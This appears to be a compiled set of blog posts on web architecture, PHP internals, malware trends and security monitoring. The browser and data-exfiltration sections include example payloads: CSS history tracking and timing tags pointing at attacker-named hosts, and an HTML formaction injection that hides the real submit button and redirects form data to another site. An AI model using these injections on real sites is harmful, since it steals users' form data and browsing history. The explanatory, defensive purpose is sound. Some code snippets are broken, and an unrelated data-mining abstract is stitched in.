Just some personal notes and thoughts about a different approach to cybersecurity defense system.

In the cyberspace the scenario in which every day an Information System (IS) lives is more or less this one:

  1. It could have a cyberattack by bad guys/organizations;
  2. If the cyberattack has success the Information System could be compromised in a hide or manifest way;
  3. If we realize that the Information System is compromised, we start the security crisis management;
  4. After the incident management we analyze what happened and try to harden more the defense system.    

Cybersecurity attacks

The cyberspace is not a secure world you can be the target of many types of attacks, for example we can have:

  • Denial-of-service (DoS) and distributed denial-of-service (DDoS) attacks;
  • Man-in-the-middle (MitM) attack;
  • Drive-by attack;
  • Password attack;
  • SQL injection attack;
  • Cross-site scripting (XSS) attack;
  • Eavesdropping attack;
  • Birthday attack;
  • Malware attack;
  • Phishing and spear phishing attacks;
  • And so on.

Cybersecurity HIDE incident

If the attack has been success but we don’t have any idea about what’s going on. This is the worse situation in which we can be. No one alerts us about it. The question is: where is my high defense system? In this situation only a very smart and good monitor system can detect that my system is compromised and where is the problem.

Cybersecurity manifest incident

If the attack has been success and we realize that our information system is compromised we can only face and manage the incident, which could be:

  • A Data leakage of any type: mails, photos, credit card data, sensitive personal data and so on;
  • A Crashed web sites;
  • A Breached networks;
  • A Denials of service;
  • A Hacked devices;
  • A Organizations’ decrease of reputation by leakage of information or successful cyberattack with huge economic loss;
  • A Personal loss of reputation;
  • And so on

Post-incident analysis

In this phase it occurs to assess the causes and to analyze the company’s crisis management capabilities in order to eliminate deficiencies in the cyber defense system to improve its resilience.

First Line of defense model

But what is the first line of defense model? As we can see in schema is the monitor system. It is very important and its role is crucial and fundamental. Every slice of second it has to tell us:

  • First of all I’m good I’m working well, I’m not compromised;
  • the IS is not under attack;
  • the IS is working according the specifications and it is not compromised.


  • The IS is under attack but it is not compromised and I immediately inform the emergency team to stop it.
  • The system is compromised I didn’t detect the intrusion but I realize that the attack had success we need to recovery. This is the worse situation but the monitor immediately alert system advises about it in order to contain the damage.


Anyone of the above sentence is a fake news. This means the monitoring system does work well. In this case we are in the very bad situation that we need to minimize by increasing and improving the capabilities and intelligence of control and auditing every days of monitor system.

But what does the monitor mean?

Monitor means to check, to verify that everything is working according the rules and specifications.

The monitoring activity should be at different levels:

  • Network level that is packet analysis and so on;
  • Operating system level;
  • Application Level;
  • User behavior;

and it should  analyze, combine and correlate events at different levels for a better control of IS. I think we can have the last defense technology but without a very smart monitor working 24/7 on the information system we don’t have a good cyber security system.

The PHP Server Engine Architecture

PHP is a recursive acronym that stands for “PHP Hypertext Preprocessor” (though it originally stood for “Personal Home Page” in 1995). It allows embedding code within HTML templates, using a language similar to Perl and Unix shells.

It is parsed and executed by the Zend Engine on the server side.

PHP Web Server

Figure 1 - PHP Web Server Architecture

Zend refers to the language engine, PHP's core. “The Zend Engine is an open source scripting engine opcode-based: (a Virtual Machine), commonly known for the important role it plays in the web automation language PHP. It was originally developed by Andi Gutmans and Zeev Suraski while they were students at the Technion - Israel Institute of Technology. They later founded a company called Zend Technologies in Ramat Gan, Israel. The name Zend is a combination of their forenames, Zeev and Andi.”1

Now we are going to explain the most important modules of PHP web server shown in Figure 1.

External modules can be loaded from the disk at script runtime using the function “bool dl (string $library)”. After the script is terminated, the external module is discarded from memory.

Built-in modules are compiled directly into PHP and carried around with every PHP process; their functionality is available to every script that's being run.

Memory Management: Zend gets full control over all memory allocations in fact it determines whether a block is in use, automatically freeing unused blocks and blocks with lost references, and thus prevent memory leaks.

Zend Executor: Zend Engine compiles the PHP Code in the intermediate code Opcode which is executed by the Zend Executor which converts it to machine language.


How PHP Server Engine works

A PHP script is executed by walking it through the following steps:

  1. The script is run through a lexical analyzer to convert the human-readable code into tokens. These tokens are then passed to the parser.

  1. The parser parses, manipulates and optimizes the stream of tokens passed to it from the lexical analyzer and generates an intermediate code called opcodes2 that runs on the Zend Engine. This two steps which represents the compilation phase are provided by the Run-Time Compiler module as shown in Figure 1.

  2. After the intermediate code is generated, it is passed to the Executor. The executor steps through the op array, using a function for each opcode and HTML is generated for the same.

  3. This generated HTML is sent to client, if the web browser supports compressed web pages the HTML is encoded using gzip or deflate before sending.

  4. This opcode is flushed from memory after execution.

Here it is the modern working flow using of cached to improve speed of PHP processing:

2 This intermediate code (opcodes ) is an ordered array of instructions (known as opcodesshort for operation code) that are basically three-address code: two operands for the inputs, a third operand for the result, plus the handler that will process the operands. The operands are either constants or an offset to a temporary variable, which is effectively a register in the Zend virtual machine.

Zend Processing

Figure 2 -Zend Processing


An easy example

Let’s consider the following PHP document (.php) in order to understand what happens:



<title>Party List</title>



<p> The list of participants to the event is: </p>
Foreach ($aGuest as $Guest) {
Echo “<li>”.$aGuest.”</li>;

PHP document of input

The .php file is pre-processed by the server considering the text embedded within “<?php ?>” blocks as PHP syntax, while text outside these blocks as arguments passed to “print” statements. The resulting output file of pre-processing phase is the following file.

Print “<html>”;
Print “<head>”;
Print “<title>Party List</title>”;
Print “</head>”;
Print “<body>”;
Print “<p> The list of participants to the event is: </p>”;
Print “<ol>”;
Foreach ($aGuest as $Guest) {
Echo “<li>”.$aGuest.”</li>;
Print </ol>”;
Print “</body>”;
Print “</html>”;

PHP document after pre-processing

Then the file above is processed by PHP processor (Zend Engine) generating the following HTML document which is sent back to the user agent:

<title>Party List</title>
<p> The list of participants to the event is: </p>

PHP document after Zend Engine Processing


Web servers, browsers, and proxies communicate by exchanging HTTP messages on a network structure using the request-response virtual circuit.

Web severs enable HTTP access to a collection of documents. And other information organized into a tree structure, much like a computer file system.

Figure 1 - Request-Response Schema

Web server receives and interprets HTTP requests from a client generally a browser. Then it examines the requests and maps the resource identifier to a file or forwards the request to a program which then produces the requested data. Finally, the server sends the response back to the client.

The behaviour of a single-tasking HTTP Server using the Petri Net1 formalism is shown in Fig. 2.

1 A Petri net consists of places, transitions, and directed arcs. Arcs run from a place to a transition or vice versa, never between places or between transitions. The places from which an arc runs to a transition are called the input places of the transition; the places to which arcs run from a transition are called the output places of the transition. More information is at link http://en.wikipedia.org/wiki/Petri_net.

Figure 2 – Behavior of a single-tasking HTTP server.


In this section we are going to show the reference architecture for web server domain. It defines the fundamental components of the domain and the relations between these components.

The reference architecture provides a common nomenclature across all software systems in the same domain, which allows:

  1. to describe uniformly the architecture of a web server and to understand a particular web server passing before through its conceptual architecture and then through its concrete architecture, which may have extra features based on its design goals. For example, not all web servers can serve Java Servlets;

  2. to compare different architecture by using a common level of abstraction.

The web server reference architecture proposed is shown in Fig. 3. As you can see, it specifies the data flow and the dependencies between the seven subsystems. These major subsystems are divided between two layers: a server layer and a support layer.

Figure 3 - Web Server reference architecture.

The Server Layer contains five subsystems that encapsulate the operating system and provides the requested resources to the browser using the functionality of the local operating system. We will now describe every subsystem of the layer.

  • The Reception subsystem implements the following functionalities:

  1. It is waiting for the HTTP requests from the user agent that arrive through the network. Moreover it contains the logic and the data structures needed to handle multiple browser requests simultaneously.

  2. Then it parses the requests and, after building an internal representation of the request, sends it to the next subsystem.

  3. At the end it sends back the request’s response according to the capabilities of the browser.

  • The Request Analyzer subsystem operates on the internal request received by the Reception subsystem. This subsystem translates the location of the resource from a network location to a local file name. It also corrects typing user error. For example if the user typed indAx.html, the Request Analyzer automatically corrects it in index.html.

  • The Access Control subsystem authenticates the browsers, requesting a username and password, and authorizes their access to the requested resources.

  • The Resource Handler subsystem determines the type of resource requested by the browser. If it is a static file that can be sent back directly to the user or if it is a program that must be executed to generate the response.

  • The Transaction Log subsystem records all the requests and their results.

The support layer contains two subsystems that provide services used by the upper server layer.

  • The Utility subsystem contains functions that are used by all other subsystems.

  • The Operating System Abstraction Layer (OSAL) encapsulates the operating system specific functionality to facilitate the porting of the web server to different platforms. This layer will not exist in a server that is designed to run on only one platform.

There are two others aspects that characterize web server architecture and go in during its activity:

  • The processing model: it describes the type of process or threading model used to support a Web Server operation;

  • The pool-size behaviour: it specifies how the size of the pool or threads varies over time in function of workload.

The main processing models are:

    • Process-based servers: the web server uses multiple single-threaded processes each of which handles one HTTP request at a time.

Figure 4 - Web Server: Process-Based model.

    • Thread-based servers: the web server consists of a single multi-thread process. Each thread handles one request at a time.

Figure 5 - Web Server: Thread-Based model.

    • Hybrid model servers: the web server consists of multiple multithreaded processes, with each thread of any process handling one request at a time.

Figure 6 - Web Server: multiple multi-threaded processes.

For the pool size behaviour we have two approaches:

  1. Static approach: the web server creates a fixed number of processes and threads at the start-up time. If the number of requests exceeds the number of threads/processes, the requests wait in the queue until a thread/process becomes free to serve it.

  2. Dynamic approach: the web server increases or decreases the pool of workers (processes and threads) in function of the numbers of requests. These behaviour decreases the queue size and the waiting time of each request.

Reception Subsystem: queue of requests and responses management

The Reception Subsystem maintains a queue of requests and responses to carry out its job within the context of a single continuously open connection. A series of requests may be transmitted on it and the responses to these requests must be sent back in the order of request arrival (FIFO). One common solution is for the server to maintain both an input and an output queue of requests. When a request is submitted for processing, it is removed from the input queue and inserted into the output queue. Once the processing is complete, the request is marked for release, but it remains on the Output Queue while at least one of its predecessors is still there. When the response is sent back to the browser the related request is released. Here is a code snippet using a C-like language to show how the queue of requests and responses are managed.


// UserRequest: represents the user request

// WebResponse: represents the relative web response


RequestQueueElement = (UserRequest, Marker);

ResponseQueueElement = (WebServerResponse, RelatedUserRequest);

// Requests that are not processed yet

Queue RequestQueueElement RequestInputQueue; 

// Requests that are in processing or already processed

Queue RequestQueueElement RequestOutputQueue;

// Responses related to User Requests 

ResponseOutputQueue; // FIFO politics


While (true) {

If <User Request arrived> {

Enqueue(UserRequest, RequestInputQueue); 


If <User Request can be processed> {

UserRequestInProcessing = 


Enqueue(UserRequestInProcessing, RequestOutputQueue);



If <User Request has been already processed> {

MarkforRelease(UserRequest, RequestOutputQueue); 

Enqueue(WebResponse, ResponseOutputQueue);


If <Length(ResponseOutputQueue)> 0 > {

WebResponse= Dequeue(ResponseOutputQueue);

RemoveFrom(WebResponse.UserRequest RequestOutputQueue);





[01] Andrea Nicchi, Web Applications: technologies and models, EAI, 2014;


Strong interests in the cyberspace produce lots of highly sophisticated malicious software.

To enter the cyberspace means to probably be the target of thieves, hackers, activists, terrorists, nation-states cyber warriors and foreign intelligence services. In this scenario the strong competition in cybercrime and cyberwarfare continuously brings an increasing proliferation of malicious programs and an increment in their level of sophistication.



According to the data published by the major antivirus companies we have an average of 400000 new malware samples every day.

Malware per Day

This data could be a little bit inflated by the antivirus companies but if we consider as true only the 2% of 400000, this means that we have 8000 new strains of computer malware per day in the wild.

Today it is impossible to live without digital technology, which is the base of digital society where governments, institutions, industries and individuals operate and interact in the everyday life.

So, to face the high-profile data breaches and ever increasing cyber threats coming from the same digital world, huge investments in information security are made around the world (according to Gartner in 2015 the spending was of above $75.4 billions).

But the security seems an illusion after hearing about the result of a research made at Imperva, a data security research firm in California.
A group of researchers infected a computer with 82 new malwares and ran against them 40 threat-detection engines of the most important antivirus companies.
The result was that only 5 percent of the malwares was detected. This means that even if the antivirus software is almost useless for fighting new malwares, it is necessary to protect us from the already known ones by increasing the level of security and protection.



In the leakage involving Twitter on June 8th 2016 user accounts have been hacked, but not on Twitter's servers. This means that 32.888.300 users have been singularly hacked by a Russian hacker. This is amazing and underlines how easy it is to guess the users' passwords and to infect users' computers in order to steal users' credentials.
The password frequencies in the following chart show how users don’t pay too much attention to the passwords they use. In the chart we consider only the first 25th most used passwords. The statistic is done on 20210641 user accounts released from several leakages [04].
They probably think: why should I be hacked? I’m a normal ordinary guy, who cares about me? But what it is important for a bad guy is to get some profit. So, a huge quantity of accounts to sell in the dark market is a good reason to steal every Twitter user's credentials. In fact, the amount is the key factor which attracts the buyer.

Most Used Password

Even if the chameleon attacks or the werewolf attacks are able to bypass easily the antivirus defense, it is important to pay more attention to our access keys to prevent the leakage of this huge quantity of user accounts because, I think, most of Twitter user accounts are simply guessed by the bad guy.




Malicious Software is characterized by four components:

  • propagation methods,
  • exploits,
  • payloads,
  • level of sophistication.


Propagations are the means of transportation of malicious code from the origin to the target. The propagation methods depend on scale and specificity. The target may be consituted by machines connected to the internet (large scale) this could mean for example that someone tries to create a bot-net. Or the target could be a small area network (small scale), for example if a company is going to be attacked for some reason.
Specificity could be connected to constraints placed on malicious code. If they are based on technical limitations they could be a particular operating system or a software version. If they are based on personal information they could be account credentials, details about co-workers or the presence of certain filenames on the victim's machine.
The level of propagation is directly proportional to the probability of detection and the limitation of defensive response.

Exploits act to enable the propagation method and payloads operation.
The exploit severity is indicated by the score (CVSS) assigned to a vulnerability.

The payloads is code written to manipulate system resources and create some effect on a computer system.
We can see that, today, there is an increase in the level of payload customization. We have payload for a web server, for a desktop computer, for a Domain Controller, for a smart phone, and so on. Every payload is tailored to a specific target in order to be very small and guarantee the maximum likelihood of success.

The level of sophistication of a malicious code can speak and tell us some useful information. MAlicious Software Sophistication analysis is an approach that can be used to figure out who is behind it: individuals, groups, organizations or states.
In this scenario we have, from one side generic malwares that are created by individuals or a small group who generally makes use of third-party exploit kits like Blackhole Exploit Kit [05], from the other side we have organizations or states with greater resources who can develop innovative attack methods and new exploits like Duqu 2.0 [06] the Most Sophisticated Malware ever seen.


The power between attacker and defender is strongly asymmetric. The defender needs huge quantities of resources to defend himself, even because he should operate in a proactive manner to fight against these kind of threats.
The study of malicious code is important to understand how attackers act in order to detect in progress attacks and to prepare a better defense response.



[01] Trey Herr, Eric Armbrust, Milware: Identification and Implications of State Authored Malicious Software, The George Washington University, 2015;
[02] https://www.first.org/: CVSS: Common Vulnerability Scoring System;

[03] Marc Goodman, Future Crimes: Inside the Digital Underground and the Battle for Or Connected world, Anchor Books, 2015.
[04] https://www.leakedsource.com/: leaked databases that contain information of large public interest.
[05] https://en.wikipedia.org/wiki/Blackhole_exploit_kit: The Blackhole exploit kit is as of 2012 the most prevalent web threat.

[06] https://en.wikipedia.org/wiki/Duqu_2.0: Kaspersky discovered the malware, and Symantec confirmed those findings.


Combining complex networks and data mining: Why and how

The increasing power of computer technology does not dispense with the need to extract meaningful information out of data sets of ever growing size, and indeed typically exacerbates the complexity of this task. To tackle this general problem, two methods have emerged, at chronologically different times, that are now commonly used in the scientific community: data mining and complex network theory. Not only do complex network analysis and data mining share the same general goal, that of extracting information from complex systems to ultimately create a new compact quantifiable representation, but they also often address similar problems too. In the face of that, a surprisingly low number of researchers turn out to resort to both methodologies. One may then be tempted to conclude that these two fields are either largely redundant or totally antithetic. The starting point of this review is that this state of affairs should be put down to contingent rather than conceptual differences, and that these two fields can in fact advantageously be used in a synergistic manner. An overview of both fields is first provided, some fundamental concepts of which are illustrated. A variety of contexts in which complex network theory and data mining have been used in a synergistic manner are then presented. Contexts in which the appropriate integration of complex network metrics can lead to improved classification rates with respect to classical data mining algorithms and, conversely, contexts in which data mining can be used to tackle important issues in complex network theory applications are illustrated. Finally, ways to achieve a tighter integration between complex networks and data mining, and open lines of research are discussed.

Complex networks; Data mining; Big Data


The web browser is a program that retrieves documents from remote servers and displays them on the screen. It allows that particular resources could be requested explicitly by URI, or implicitly by following embedded hyperlinks.

The visual appearance of a web page encoded using HTML language is improved using other technologies.

The first one is the Cascading Style Sheets (CSS) that allow adding layout and style information to the web pages without complicating the original structural mark-up language.

The second one is JavaScript (now standardized as ECMAScript scripting language [1]), which is a host environment for performing client-side computations. It is embedded within HTML documents and the corresponding displayed page is the result of evaluating the JavaScript code and of applying it to the static HTML constructs.

The last one is the using of plugins[2], small extensions that are loaded by the browser and used to display some types of content that the web browser cannot display directly, such as Macromedia Flash animations and Java Applets.

[1] ECMA International is an industry association founded in 1961 and dedicated to the standardization of Information and Communication Technology (ICT) and Consumer Electronics (CE).
[2] A plug-in (also called plugin, addin, add-in, addon, add-on, snap-in, snapin) is a small software computer program that extends the capabilities of a larger program. Plugins are commonly used in web browsers to enable them to play sounds, video clips, or automatically decompressing files.


The web browser is perhaps the most widely used software application running on diverse types of operating system. For this reason, reference architecture is useful to understand how a web browser operates and what services it supplies. A schema of the reference browser architecture is shown in figure 1.

Web browser reference architecture

Figure1 - Web browser reference architecture

The reference schema is made up of eight major subsystems plus the dependencies between them:
1. The User Interface subsystem is the layer between the user and the Browser Engine. It provides features such as toolbars, visual page-load progress, smart download handling, preferences and printing.
2. The Browser Engine subsystem is a component that provides a high-level interface to the Rendering Engine. It loads a given URI and supports primitive browsing actions such as forward, back, and reloading. It provides hooks for viewing various aspects for browsing session such as current page load progress and JavaScript alerts. It also allows querying and manipulation of Rendering Engine settings.
3. The Rendering Engine subsystem produces a visual presentation for a given URI. It is capable of displaying HTML and Extensible Markup Language (XML) documents, optionally styled with CSS, as well as embedded content such as images. It calculates the exact page layout and may use “reflow” algorithms to incrementally adjust the position of elements on the page. This subsystem also includes the HTML parser. As an example the most popular Rendering Engines are Trident for Microsoft Internet Explorer, Gecko for Firefox, WebKit for Safari and Presto for Opera.
4. The Networking subsystem implements file transfer protocols such as HTTP and FTP. It translates between different character sets, and resolves MIME[3] media types for files (see figure 2). It may implement a cache of recently retrieved resources.


Figure 2 - MIME TABLE role

5. The JavaScript Interpreter evaluates JavaScript code which may be embedded in web pages. JavaScript is an object-oriented scripting language developed by Brendan Eich for Netscape in 1995. Certain JavaScript functionalities, such as the opening of pop-up windows, may be disabled by the Browser Engine or Rendering Engine for security purposes. In the following table we can see examples of JavaScript Interpreter.


[3] MIME was originally intended for use with e-mail attachments, in fact MIME stands  for Multimedia Internet Mail Extensions. Unix systems made use of a .mailcap file, which was a table associating MIME types with application programs. Early browsers made use of this capability, now substituted by their own MIME configuration tables.

6. The XML Parser subsystem parses XML documents into a Document Object Model (DOM) tree.

7. The Display Backend subsystem provides drawing and windowing primitives, a set of user interface widgets, and a set of fonts. It may be tied closely with the operating system.

8. The Data Persistence subsystem stores various data associated with the browsing session on disk. These may be high-level data such as bookmarks or toolbars settings, or they may be low-level data such as cookies, security certificates, or caches.



In the following table we can see a comparison between a classical OS and the Internet Browser.


Browser Same Origin Policy (SOP)

Two pages have the same origin if the protocol, port (if one is specified), and host are the same for both pages.




The SOP is identified by (http, AWebSite.com, 80).



While in this case the SOP is identified by (https, AWebSite.com, ).

The interaction between sites of different domains is regulated by the SOP. Every browser implements this policy which means:

  • on the client side: cookies from origin (document.domain) A are not visible to origin B; scripts from origin A cannot read or set properties for origin B using DOM interface.
  • on server side: SOP allows “send-only” communication to remote site.

Setting document.domain of a web page changes the origin of the page in fact this property sets or returns the domain name of the server from which the document is originated.


Some Same Origin Policy (SOP) Violations

1)    Tracking users by querying user’s history file.

<style> a#visited {background: url (www.badsite.com/trackuser.php?bank.com); } </style>
<a href=”http://www.bank.com/” > Hi! </a>

The application of this type of violation could be:

  • Spear phishing;
  • Marketing;
  • Use browsing history as second factor authentication.


2)    Cross-site Timing attacks.

The response time depends on private user state, for example:

  • If the user is logged or not;
  • From number of elements in shopping cart;
  • So on…

In general all web sites leak information by timing.

A link tag can be used to leak timing information based on the fact that a Browser stops parsing until link is resolved.

<link rel=“stylesheet” href=“attacker.com/img1.gif”>
<link rel="stylesheet“ href=“victim.com/login.html" />
<img rel=“stylesheet” href=“attacker.com/img2.gif>

Attacker learns how long it took to load victim/login.html.



[01] Alan Grosskurth, Michael W. Godfrey, Architecture and evolution of the modern web browser, David R. Cheriton School of Computer Science, University of Waterloo, Waterloo, 2006;

[02] Iris Lai, Jared Haines Johm, Chun-Hung, Chiu Josh Fairhead, Conceptual Architecture of Mozilla Firefox (version, SEng 422 Assignment 1 Dr. Ahmed E. Hassan, 2007;

[03] Nicchi A., Web Applications: technologies and models, Edizioni Accademiche Italiane, 2014;

[04] Charles Reis, Steven D. Gribble, Isolating Web Programs in Modern Browser Architectures, University of Washington, 2009;

[05] Stanford Advanced Computer Security Certificate Program, Browser Security Model and SOAP Violations, 2007.




As we can see on [2] “The Indexed Web contains at least 2.02 billion pages (Saturday, 05 July, 2014)”.

As a consequence we need to use a service of a web search engine if we want to find something of interest on the Web or answers to some questions .


For this reason search engines are generally used as “Internet users' entry point to the digital world” [1] to make their searches (according to ComScore [3] searches are defined as “user engagement with a search service with the intent to retrieve search results.”).

In the following figure we can see an outlook of web search scenario in relation to the huge quantity of web pages.

Web Search Engine Outlook


We have many types of web search engines working on indexed pages:


  • GENERAL SEARCH ENGINE like Google, Bing and Yahoo;
  • COMPUTATIONAL KNOWLEDGE ENGINE like www.wolframalpha.com;
  • ANSWER SEARCH ENGINE like www.chacha.com;
  • IMAGE SEARCH ENGINE like www.picsearch.com;
  • VIDEO SEARCH ENGINE like on.aol.com;
  • TORRENT SEARCH ENGINE like www.ktorrents.com;
  • PERSON SEARCH ENGINE like www.spokeo.com;
  • EMAIL SEARCH ENGINE like www.emailsherlock.com;
  • BUSINESS SEARCH ENGINE like www.business.com;
  • BLOG AND FORUM SEARCH ENGINE like omgili.com;
  • META-SEARCH ENGINE like www.dogpile.com.


As we have many search services, the web search is still dominated by Google, Microsoft and Yahoo. The following figure gives a clear idea even if it's referred to 2012. The graph in the figure is based on 200 billion searches done in the United States in 2012 [1].


Internet Searches 2012


The next step for the web search engines will be the semantic search because people are going to commuicate with them in a way that's much more natural to their thinking. So the web search engines should try to understand the meaning and, in relation to it, should give the more appropriate and pertinent answer.


  1. The Global Edition of the New York Times. Friday, April 5, 2013 page 15. “Web Searches that try to read your mind”;
  2. http://www.worldwidewebsize.com/;
  3. http://www.comscore.com/: Analytics for a Digital World™.


Web Applications: technologies and models

An analysis of Web Application frameworks

Edizioni Accademiche Italiane ( 12.06.2014 )

Web Application:  technologies and models

The book is a survey and an analysis of the technologies used in the development of a web application, paying attention to the architectures and the models. The survey is not exhaustive but it gives an outlook of all players involved in a web application development.

At first we have analyzed:

a) web browser architecture and functionalities: it represents the client part of a web application;

b) web server architecture and functionalities: it is the more complex and active part of a web application.

Then the technologies AJAX and REST have been examined, which have produced a paradigm shift in the web application design.

At last, in the light of the analyzed technologies, the various web application development approaches have been investigated by an appropriate level of abstraction. The state management mechanisms and the event-loop both on the client-side and on the server-side have been the main issue in the investigation because of stateless nature of HTTP protocol.

Web Applications: technologies and models

The picture above is a courtesy of Vincenzo Guardino.


The argument of this article is the leakage of sensitive information from a protected network to an external network due to intruders exploiting the various vulnerabilities of the hw-sw system. Sensitive information could be contained in:

  • static files: images, texts, spreadsheets, phone-books, agenda etc.;
  •  multimedia sessions: telephone conversations, video conferences, chatting channels (text, video image).

The leakage can be done in several ways:

- the data are ex-filtrated without altering the original files;
- the data are modified: converted in new file format or encrypted;
- the data are hidden using steganography techniques;
- the data are ex-filtrated using a combination of the aforementioned techniques.

“Data exfiltration is the unauthorized transfer of sensitive information from a target’s network to a location which a threat actor controls”. [02]
Considering the data-exfiltartion at several levels and analysing the related risks we have the following threats:

National Security: the steal of classified documents may endanger national security;
Organizations: proprietary information can be sold to a rival company causing a loss of competitive advantage;
Citizens: the spreading of personal sensitive data could have serious privacy and security implications like identity theft.

For the National Security and Organizations the worst scenario is when the attackers not only steal data but also modify them producing cyber-espionage and cyber-sabotage.



An attacker can export users’ sensitive data using “HTML form injection attack”. Here is an example of using the formaction attribute. According to the HTML 5 specification, it can be used to overwrite the action attribute of its parent form.

Le us consider the following normal form in a HTML page:


<form action=”URL” ... >

list of couples (label, data-box)

<button type=”submit”... /> label </button>



We inject a formaction attribute:

<form action=”URL” ... >

list of couples (label, data-box)

<button type="submit" formaction="BAD URL "> Fake Search! </button>


The injected form sends its form-data to BAD URL instead of URL.



The following HTML:



<form name="fsbycode" class="s4form" action="http://www.spunctum.it" method="post">

<h2>Search Guest By Numeric Code</h2>

Codice Numerico: <input type="number" autocomplete="on" id="icode" name="icode" autofocus placeholder="Insert Code Number" >

<input class="SButton" type="submit" value="Search!">




Produce this form in the web browser:

Normal Web Form

On the other hand now we have the abused HTML:
<form name="fsbycode" class="s4form" action="http://www.spunctum.it" method="post">

<h2>Search Guest By Numeric Code</h2>

Codice Numerico: <input type="number" autocomplete="on" id="icode" name="icode"
autofocus placeholder="Insert Code Number" >

<!-- BEGIN attacker's code -->
      <button type="submit" formaction="http://www.volucer.it"> Fake Search! </button>
      <style> .SButton {visibility:hidden;} </style>
<!-- END attacker's code -->

<input class="SButton" type="submit" value="Search!">



It is important to point out that the formaction attribute is supported in Internet Explorer 10, Firefox, Opera, Chrome, and Safari.

The previous HTML shows in the browser:

Abused Web Form
By clicking on Fake Search! button the next HTTP request is produced:

POST http://www.volucer.it/ HTTP/1.1
Host: www.volucer.it
Proxy-Connection: keep-alive
Content-Length: 16
Cache-Control: max-age=0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Origin: null
User-Agent: Mozilla/5.0 (Windows NT 5.1) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/34.0.1847.116 Safari/537.36
Content-Type: application/x-www-form-urlencoded
Accept-Encoding: gzip,deflate,sdch
Accept-Language: it-IT,it;q=0.8,en-US;q=0.6,en;q=0.4,he;q=0.2


This show how the data are sent to www.volucer.it instead of www.spunctum.it.



In order to face this serious problem the security system of a ICT infrastructure must be equipped with mechanisms for prevention, detection, damage limitation and monitoring.

The goal of prevention is to lower the risk of attacks.
The blocking of unauthorized communication channels is a mechanism to prevent the exfiltration of data externally to the organization through compromised applications.

We need a system to detect when a web site is compromised to promptly react to the attack.
The use of Sensitive Information Dissemination Detection (SIDD) systems is a mechanism for stopping leakage of sensitive information on time. It monitors the outbound traffic from the protected network, taking actions responsively in case of suspect traffic of packets.

When the attack is in progress we have to limit the damages.
After attack detection this is what must be done:

1) minimize the information leakage;
2) analyze what vulnerability has been exploited and if it is structural of the system or not;
3) harden the security of the information system to avoid another attack of the same type.

If the security system doesn't detect any problems. It is still highly recommended to run a random deep security check because an information leakage could have been happened without anyones awareness of it.



  1. Eric Y. Chen, Sergey Gorbaty, Astha Singhal and Collin Jackson: Self-Exfiltration: The Dangers of Browser-Enforced Information Flow Control, Carnegie Mellon University;
  2. http://blog.trendmicro.com/trendlabs-security-intelligence/data-exfiltration-in-targeted-attacks/;
  3. Yali Liu, Cherita Corbett and Ken Chiang, Rennie Archibald, Biswanath Mukherjee and Dipak Ghosal, SIDD: A Framework for Detecting Sensitive Data Exfiltration by Insider Attack, University of California, Usa.